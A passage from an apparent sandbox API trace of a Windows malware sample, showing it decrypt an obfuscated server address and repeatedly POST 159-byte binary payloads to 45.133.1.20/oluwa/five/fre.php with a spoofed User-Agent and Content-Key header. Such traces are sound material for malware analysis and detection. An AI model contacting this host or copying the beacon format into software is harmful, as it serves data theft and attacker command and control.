buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0189.700] GetProcessHeap () returned 0x6a0000 [0189.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0189.705] GetProcessHeap () returned 0x6a0000 [0189.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0189.706] GetProcessHeap () returned 0x6a0000 [0189.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0189.707] GetProcessHeap () returned 0x6a0000 [0189.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0189.708] closesocket (s=0x478) returned 0 [0189.710] GetProcessHeap () returned 0x6a0000 [0189.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0189.710] GetProcessHeap () returned 0x6a0000 [0189.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0189.711] GetProcessHeap () returned 0x6a0000 [0189.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0189.712] GetProcessHeap () returned 0x6a0000 [0189.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0189.713] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x11ec) returned 0x478 [0189.714] Sleep (dwMilliseconds=0xea60) [0189.715] GetProcessHeap () returned 0x6a0000 [0189.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0189.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.717] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0189.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.726] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0189.740] GetProcessHeap () returned 0x6a0000 [0189.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0189.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.741] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0189.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.742] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0189.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.744] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0189.745] GetProcessHeap () returned 0x6a0000 [0189.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0189.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.751] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0189.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.753] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0189.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.754] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0189.754] GetProcessHeap () returned 0x6a0000 [0189.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0189.755] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.758] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0189.759] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.759] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0189.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.761] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0189.761] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.762] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0189.762] GetProcessHeap () returned 0x6a0000 [0189.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0189.762] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0189.762] GetProcessHeap () returned 0x6a0000 [0189.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0189.763] GetProcessHeap () returned 0x6a0000 [0189.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0189.763] GetProcessHeap () returned 0x6a0000 [0189.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0189.764] GetProcessHeap () returned 0x6a0000 [0189.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0189.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.765] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0189.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.775] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0189.787] GetProcessHeap () returned 0x6a0000 [0189.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0189.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.789] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0189.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.790] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0189.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.791] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0189.791] GetProcessHeap () returned 0x6a0000 [0189.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0189.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.793] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0189.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.794] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0189.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.796] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0189.796] GetProcessHeap () returned 0x6a0000 [0189.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0189.797] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.797] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0189.798] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.798] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0189.802] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.802] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0189.803] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.804] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0189.804] GetProcessHeap () returned 0x6a0000 [0189.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0189.804] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0189.804] GetProcessHeap () returned 0x6a0000 [0189.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0189.804] socket (af=2, type=1, protocol=6) returned 0x47c [0189.804] connect (s=0x47c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0189.833] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0189.833] GetProcessHeap () returned 0x6a0000 [0189.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0189.833] GetProcessHeap () returned 0x6a0000 [0189.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0189.835] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0189.836] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0189.836] GetProcessHeap () returned 0x6a0000 [0189.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0189.837] GetProcessHeap () returned 0x6a0000 [0189.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0189.837] GetProcessHeap () returned 0x6a0000 [0189.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0189.837] GetProcessHeap () returned 0x6a0000 [0189.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0189.838] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0189.840] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0189.840] GetProcessHeap () returned 0x6a0000 [0189.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0189.840] GetProcessHeap () returned 0x6a0000 [0189.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0189.841] send (s=0x47c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0189.841] send (s=0x47c, buf=0x6bb998*, len=159, flags=0) returned 159 [0189.841] GetProcessHeap () returned 0x6a0000 [0189.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0189.842] recv (in: s=0x47c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0189.945] GetProcessHeap () returned 0x6a0000 [0189.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0189.945] GetProcessHeap () returned 0x6a0000 [0189.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0189.945] GetProcessHeap () returned 0x6a0000 [0189.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0189.946] GetProcessHeap () returned 0x6a0000 [0189.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0189.946] closesocket (s=0x47c) returned 0 [0189.947] GetProcessHeap () returned 0x6a0000 [0189.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0189.947] GetProcessHeap () returned 0x6a0000 [0189.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0189.947] GetProcessHeap () returned 0x6a0000 [0189.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0189.948] GetProcessHeap () returned 0x6a0000 [0189.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0189.949] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x11f0) returned 0x47c [0189.951] Sleep (dwMilliseconds=0xea60) [0189.953] GetProcessHeap () returned 0x6a0000 [0189.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0189.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.954] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0189.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.964] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0189.977] GetProcessHeap () returned 0x6a0000 [0189.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6bfc98 [0189.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.978] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6bfc98, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0189.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.980] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0189.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.981] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0189.981] GetProcessHeap () returned 0x6a0000 [0189.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bfc98 | out: hHeap=0x6a0000) returned 1 [0189.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.983] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0189.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.984] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0190.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.025] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0190.025] GetProcessHeap () returned 0x6a0000 [0190.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0190.026] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.027] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0190.027] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.027] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0190.028] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.028] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0190.029] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.029] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0190.029] GetProcessHeap () returned 0x6a0000 [0190.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0190.030] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0190.030] GetProcessHeap () returned 0x6a0000 [0190.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0190.030] GetProcessHeap () returned 0x6a0000 [0190.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0190.030] GetProcessHeap () returned 0x6a0000 [0190.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0190.031] GetProcessHeap () returned 0x6a0000 [0190.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0190.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.032] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0190.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.038] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0190.045] GetProcessHeap () returned 0x6a0000 [0190.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0190.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.046] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0190.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.047] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0190.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.049] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0190.049] GetProcessHeap () returned 0x6a0000 [0190.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0190.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.051] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0190.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.053] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0190.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.055] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0190.055] GetProcessHeap () returned 0x6a0000 [0190.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0190.056] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.057] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0190.058] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.059] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0190.060] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.061] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0190.063] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.063] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0190.063] GetProcessHeap () returned 0x6a0000 [0190.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0190.064] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0190.064] GetProcessHeap () returned 0x6a0000 [0190.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9b0 [0190.064] socket (af=2, type=1, protocol=6) returned 0x480 [0190.064] connect (s=0x480, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0190.087] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0190.087] GetProcessHeap () returned 0x6a0000 [0190.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0190.087] GetProcessHeap () returned 0x6a0000 [0190.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0190.088] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0190.088] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0190.088] GetProcessHeap () returned 0x6a0000 [0190.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0190.089] GetProcessHeap () returned 0x6a0000 [0190.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0190.089] GetProcessHeap () returned 0x6a0000 [0190.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0190.090] GetProcessHeap () returned 0x6a0000 [0190.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0190.090] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0190.091] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0190.092] GetProcessHeap () returned 0x6a0000 [0190.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0190.092] GetProcessHeap () returned 0x6a0000 [0190.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0190.093] send (s=0x480, buf=0x6b5c98*, len=242, flags=0) returned 242 [0190.094] send (s=0x480, buf=0x6bb998*, len=159, flags=0) returned 159 [0190.094] GetProcessHeap () returned 0x6a0000 [0190.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0190.094] recv (in: s=0x480, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0190.181] GetProcessHeap () returned 0x6a0000 [0190.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0190.181] GetProcessHeap () returned 0x6a0000 [0190.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0190.182] GetProcessHeap () returned 0x6a0000 [0190.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0190.182] GetProcessHeap () returned 0x6a0000 [0190.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0190.182] closesocket (s=0x480) returned 0 [0190.183] GetProcessHeap () returned 0x6a0000 [0190.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 